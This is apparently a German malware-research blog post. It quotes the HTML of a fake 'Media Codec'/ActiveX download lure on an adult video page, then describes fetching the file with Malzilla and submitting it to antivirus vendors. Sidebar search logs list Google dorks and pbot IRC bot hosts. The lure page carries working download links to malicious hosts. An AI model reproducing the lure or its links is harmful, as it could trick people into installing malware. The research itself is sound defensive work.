To download and install ActiveX Object click <a href="http://sexicodecstars.com/download/502/725/4/" style="font:11px Arial;color:#000000;text-decoration:underline;">Continue</a>.<br /><br />
<input type="submit" value="Continue" onClick="Down('iax');" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#009CEE;background-image:url(http://adult-freetube-8.com/i/img5.gif);width:104px;height:26px;border:0;">
<input type="submit" value="Cancel" onClick="Close();" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#A1A1A1;background-image:url(http://adult-freetube-8.com/i/img5_.gif);width:104px;height:26px;border:0;">
<input type="submit" value="Details..." onClick="Details();" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#A1A1A1;background-image:url(http://adult-freetube-8.com/i/img5_.gif);width:104px;height:26px;border:0;">
</font>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="6"><img src="http://adult-freetube-8.com/i/img6.gif" width="389" height="6" alt="" /></td>
</tr>
</table>
</DIV>
<SCRIPT>Drag.init(document.getElementById('popdiv'));</SCRIPT>
<BR /><BR />
<BR />
<DIV style="FONT: 16pt Verdana">7 min 53 sec, Raiting 6/10, 50553 views</DIV>
<DIV style="FONT: 14pt Arial">34 users are watching this movie right now</DIV><BR /><A
style="BACKGROUND: #0000cc; FONT: bold 8pt Verdana; COLOR: #ffffff"
href="http://sexicodecstars.com/download/502/725/4/">Download Media Codec V1.668.3</A> </CENTER><BR /></DIV></BODY></HTML>
Suchen wir uns mal einen von den lustigen links aus!
malzilla zeigt uns dieses fenster:
Nach dem bestätigen müssen wir nochmal get drücken und wir werden gefragt wo die datei gespeichert werden soll.
...natürlich in .\malware\ :)
Da wollen wir doch mal sehen , was die AVs so davon halten !
Den aktuellen stand der untersuchung bei AVIRA könnt ihr euch auf Frau Katsumi's uploads anschauen.
Die Nummer ist [#139060] . Mal sehn wie lange das diesmal dauert, 2 Tage?
Nun werde ich mal den linksammler starten und gefundene domains auf robtex.com auf zusammenhänge prüfen.
Ich denke dafür werde ich einen neuen artikel schreiben.
Ich hoffe, dass das ganze verständlich und nachvollziehbar geschrieben ist.
gruss,
kat
Trackbacks
Trackback specific URI for this entry
No Trackbacks
Comments
Display comments as
(Linear | Threaded)
da kam gestern auch nen schöner bericht drüber bei akte08. am ende der firmen kette sitzt wohl nen 28 jähriger, dem es richtig gut geht =)
Umsatz durch die abzocke, waren geschätzte 2,7 Mio Euro . . .
hoppala das war zu früh =) das sollte natürlich zu nachbarschaftspost.
Pages
katsumi's page
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
Links
gut verglast ist ....
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
Quicksearch
Categories
Archives
Letzte Goggele Suche
"© 2011 Powered by Subrion CMS"
"© 2011 Powered by Subrion CMS"
4521569111
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
213.251.169.156 pbot
in my world theres no left right grospolina
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
verfassung und verfassungsvertrag guttenberg
dumme musikindustrie
"© 2011 Powered by Subrion CMS"
4521569111
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
213.251.169.156 pbot
in my world theres no left right grospolina
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
verfassung und verfassungsvertrag guttenberg
dumme musikindustrie
Syndicate This Blog
Exploit-db, feed me!
Glasfeed
No RSS/OPML feed selected